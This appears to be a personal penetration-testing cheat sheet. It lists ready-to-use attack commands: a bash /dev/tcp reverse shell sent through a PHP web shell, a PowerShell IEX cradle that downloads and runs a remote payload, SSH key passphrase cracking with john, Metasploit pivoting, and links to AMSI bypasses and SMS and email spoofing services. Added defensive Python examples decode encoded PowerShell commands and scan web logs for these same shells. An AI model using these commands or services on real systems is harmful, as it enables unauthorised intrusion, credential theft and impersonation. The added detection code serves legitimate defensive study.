Categories: TCPDUMP, Uncategorized

TCPDUMP

tcpdump -i tun0 icmp (filter by protocol, here ICMP on interface tun0)


Steno

Inspect an image for embedded content

  • binwalk file.png

Extract files from image

  • binwalk -Me file.png (-M recurses into extracted files, -e extracts)
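What binwalk does for the common case of a file appended after the PNG image, shown as an added example that is not part of the original notes and not binwalk's code: walk the PNG chunk structure to find where the image really ends (the IEND chunk), then look for known file signatures in whatever trails it. The sample PNG and the appended ZIP-like blob are constructed inline; the signature table is a small, hand-picked subset, not binwalk's full database.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Small constructed table of magic bytes; binwalk's real signature set is far larger.
SIGNATURES = {
    b"PK\x03\x04": "zip",
    b"\x1f\x8b\x08": "gzip",
    b"%PDF-": "pdf",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
}


def walk_png_chunks(data):
    """Parse the chunk list of a PNG.

    Returns (chunks, end) where chunks is a list of (type, offset, length)
    and end is the byte offset just past the IEND chunk, i.e. where the
    image proper ends and any appended payload would begin.
    """
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    chunks = []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunks.append((ctype.decode("ascii", "replace"), pos, length))
        pos += 12 + length  # 4 length + 4 type + data + 4 CRC
        if ctype == b"IEND":
            return chunks, pos
    raise ValueError("truncated PNG: no IEND chunk")


def find_trailing_data(data):
    """Report (image_end, trailer_length, [(offset, type), ...]) for data after IEND."""
    chunks, end = walk_png_chunks(data)
    trailer = data[end:]
    found = []
    for magic, name in SIGNATURES.items():
        idx = trailer.find(magic)
        while idx != -1:
            found.append((end + idx, name))
            idx = trailer.find(magic, idx + 1)
    return end, len(trailer), sorted(found)


def make_png(width=1, height=1):
    """Build a minimal valid RGB PNG (constructed sample input)."""
    def chunk(ctype, body):
        crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    raw = b"\x00" + b"\x00\x00\x00" * width  # filter byte + black RGB pixels
    idat = zlib.compress(raw * height)
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


def build_sample():
    """Constructed: a clean PNG with a ZIP-style local file header appended after IEND."""
    return make_png() + b"PK\x03\x04" + b"\x00" * 26 + b"hidden.txt"


if __name__ == "__main__":
    end, trailer_len, found = find_trailing_data(build_sample())
    print(f"image ends at {end}, {trailer_len} trailing bytes, signatures: {found}")
```

Viewers stop at IEND, so anything after it is invisible in the picture but still on disk; a trailer length of zero is the normal case and any non-zero trailer is worth a closer look even when no known signature matches.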

SSH

Use an SSH private key (key.priv)

chmod 600 key.priv

ssh -i key.priv user@x.x.x.x

Recover the passphrase of an id_rsa key

python /usr/share/john/ssh2john.py id_rsa > test

john --wordlist=/usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt test


Interesting Sites

Recon / Enumeration

http://www.lifeoverpentest.com/
https://backdoorshell.gitbooks.io/oscp-useful-links/
https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/
https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b
https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/
https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://www.thegeekstuff.com/2010/07/execute-shell-script/
https://hashes.org/
https://github.com/blackploit/hash-identifier.git

https://ired.team/offensive-security-experiments/offensive-security-cheetsheets

https://www.secjuice.com/powershell-constrainted-language-mode-bypass-using-runspaces/

https://github.com/rasta-mouse?tab=repositories

Exploring PowerShell AMSI and Logging Evasion

https://iwantmore.pizza/posts/amsi.html

https://github.com/d0nkeys/redteam/tree/master/code-execution

https://github.com/d0nkeys/redteam

Working AMSI Bypass

https://github.com/aloksaurabh/OffenPowerSh/blob/master/Bypass/Invoke-AmsiBypass.ps1

Exploits

https://nvd.nist.gov/vuln/search
https://www.exploit-db.com/
https://packetstormsecurity.com/
https://www.securityfocus.com/vulnerabilities
https://0day.tday
http://mvfjfugdwgc5uwho.onion/

Social engineering

https://www.spoofmytextmessage.com/
https://www.spoofmyemail.com/

https://goo.gl
tinyurl.com


Python

SimpleHTTPServer

  • python -m SimpleHTTPServer 4343 (serves the current directory; default port is 8000)

SHELL

  • python -c 'import pty;pty.spawn("/bin/bash")'
  • stty raw -echo // then type fg and press Enter twice

*Check rows & columns with stty -a, then set them to match your terminal: stty rows 34 cols 136

export TERM=xterm


Powershell

Encode a script as Base64 (UTF-16LE, as PowerShell's -EncodedCommand expects)

  • cat reverse.ps1 | iconv -t UTF-16LE | base64 -w0
  • nc -lvnp 9001 (listener)
  • $username = 'username'
  • $password = 'password'
  • $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
  • $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
  • Enter-PSSession -ComputerName x.x.x.x -Port 5985 -Credential $credential

*powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/exploit.html')"
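The encoding step above (UTF-16LE, then Base64) is exactly what a defender has to reverse when an -EncodedCommand shows up in process-creation logs. The following is an added example, not part of the original notes: it mirrors the iconv/base64 pipeline in Python, decodes encoded commands found in constructed Windows 4688-style log lines, and flags the download-and-execute idiom shown in the powershell one-liner above. The log format, the parameter abbreviations handled, and the keyword list are assumptions chosen for the example.

```python
import base64
import re

# PowerShell accepts -EncodedCommand and unambiguous prefixes of it; this
# covers the abbreviations commonly seen in logs (assumed subset, not exhaustive).
ENC_RE = re.compile(r"(?i)\s-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Keywords whose presence in a decoded command warrants a closer look (assumed list).
SUSPICIOUS = ("downloadstring", "iex", "invoke-expression", "net.webclient", "frombase64string")


def encode_command(script):
    """Python equivalent of: cat script.ps1 | iconv -t UTF-16LE | base64 -w0"""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the plaintext script from a command line carrying -EncodedCommand, else None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # PowerShell tolerates missing padding; restore it
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(log_lines):
    """Decode every encoded command in the lines and return (plaintext, matched keywords)."""
    hits = []
    for line in log_lines:
        decoded = decode_encoded_command(line)
        if decoded is None:
            continue
        flags = [k for k in SUSPICIOUS if k in decoded.lower()]
        hits.append((decoded, flags))
    return hits


# Script text taken from the one-liner in these notes; the log lines around it are constructed.
SAMPLE_SCRIPT = "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/exploit.html')"
SAMPLE_LOGS = [
    "4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -nop -w hidden -enc " + encode_command(SAMPLE_SCRIPT),
    "4688 NewProcessName=C:\\Windows\\notepad.exe CommandLine=notepad.exe C:\\Users\\bob\\notes.txt",
]

if __name__ == "__main__":
    for plaintext, flags in triage(SAMPLE_LOGS):
        print(f"decoded: {plaintext}\n  flags: {flags}")
```

Decoding is deliberately done before keyword matching: searching the raw Base64 string for "IEX" or "DownloadString" finds nothing, which is the whole reason the encoding is used.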


Port Knocking

Check for port knock services

  • ls /etc/init.d
  • less /etc/init.d/knockd

Check config file

  • /etc/default/knockd

Send a TCP probe to each knock port in sequence

*for i in 571 290 911; do nmap -Pn -p $i --host-timeout 201 --max-retries 0 x.x.x.x; done


PHP


Upload php code exec script

https://www.acunetix.com/websitesecurity/php-security-2/

PHP shell

In the URL, go to shell.php?command=whoami

In Burp Suite, create a POST request

POST /url/shell.php HTTP/1.1
body: command=bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1'

URL-encode it to command=bash+-c+'bash+-i+>%26+/dev/tcp/x.x.x.x/4444+0>%261'

Set up nc to listen for the incoming connection: nc -lvnp 4444
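From the other side of the table, the request shape described above (a command in a query parameter or form body, URL-encoded, containing the /dev/tcp reverse-shell idiom) is easy to spot in web server logs. The following is an added detection example, not part of the original notes: it parses constructed Apache combined-format access-log lines, URL-decodes the values of command-style parameters, and flags shell indicators. Parameter names, indicator patterns, the 192.0.2.x addresses and the log lines themselves are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Apache/nginx combined log format (assumed); only the fields used here are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names that command-execution scripts commonly use (assumed list).
PARAM_NAMES = {"command", "cmd", "exec", "c"}

# Indicators of a shell being driven through the parameter (assumed list).
INDICATORS = [
    re.compile(r"/dev/tcp/"),               # bash reverse-shell idiom from the notes above
    re.compile(r"\bbash\s+-i\b"),           # interactive bash
    re.compile(r"\b(?:nc|ncat)\b.*\s-e\b"), # netcat with -e
    re.compile(r"\b(?:whoami|id|uname)\b"), # classic first commands after a foothold
]


def inspect_request(target, body=None):
    """Return [(param, decoded_value, [matched patterns])] for suspicious parameters.

    Query-string parameters come from `target`; for POST requests the form body
    (available from application or WAF logs, not plain access logs) can be passed in.
    """
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    if body:
        for name, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(name, []).extend(values)
    findings = []
    for name, values in params.items():
        if name.lower() not in PARAM_NAMES:
            continue
        for value in values:
            value = unquote_plus(value)  # parse_qs decoded once; handle double encoding
            matched = [p.pattern for p in INDICATORS if p.search(value)]
            if matched:
                findings.append((name, value, matched))
    return findings


def scan_log(lines):
    """Parse access-log lines and return (ip, target, findings) for each suspicious request."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = inspect_request(m.group("target"))
        if findings:
            alerts.append((m.group("ip"), m.group("target"), findings))
    return alerts


# Constructed sample log lines (TEST-NET addresses, not real hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2020:13:55:36 +0000] "GET /url/shell.php?command=whoami HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Oct/2020:13:55:40 +0000] "GET /url/shell.php?command=bash+-c+%27bash+-i+%3E%26+/dev/tcp/192.0.2.10/4444+0%3E%261%27 HTTP/1.1" 200 0',
    '192.0.2.20 - - [10/Oct/2020:13:56:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048',
    '192.0.2.30 - - [10/Oct/2020:13:56:05 +0000] "POST /url/shell.php HTTP/1.1" 200 0',
]

# The POST body form shown in the notes above, URL-encoded as there (x.x.x.x replaced by a TEST-NET address).
SAMPLE_POST_BODY = "command=bash+-c+'bash+-i+>%26+/dev/tcp/192.0.2.10/4444+0>%261'"

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, findings)
    print("POST body:", inspect_request("/url/shell.php", SAMPLE_POST_BODY))
```

Restricting the check to known parameter names keeps false positives down but also means a script using an unusual name is missed; the fourth sample line shows the other gap, a POST whose body never reaches the access log, which is why the body has to be supplied from application or WAF logging to be inspected at all.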


Nessus

/etc/init.d/nessusd start
https://127.0.0.1:8834


Metasploit tips

systemctl start postgresql (database backend for the msf workspace)
cp /usr/share/exploitdb/exploits/cgi/webapps/42344.rb /root/.msf4/modules/exploits/cgi/webapps/ (add an Exploit-DB module to the local module tree)
updatedb

sessions -u (upgrade a shell session to Meterpreter)
  • search delivery (web payload delivery)
  • search autoroute (route through a session)
  • search smb_version
  • search arp_sweep

Vulnerability Scanning in Metasploit

db_nmap -v --script vuln 192.168.0.184
  • hosts
  • services

Port forwarding

portfwd add -l 3389 -p 3389 -r target-host

Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell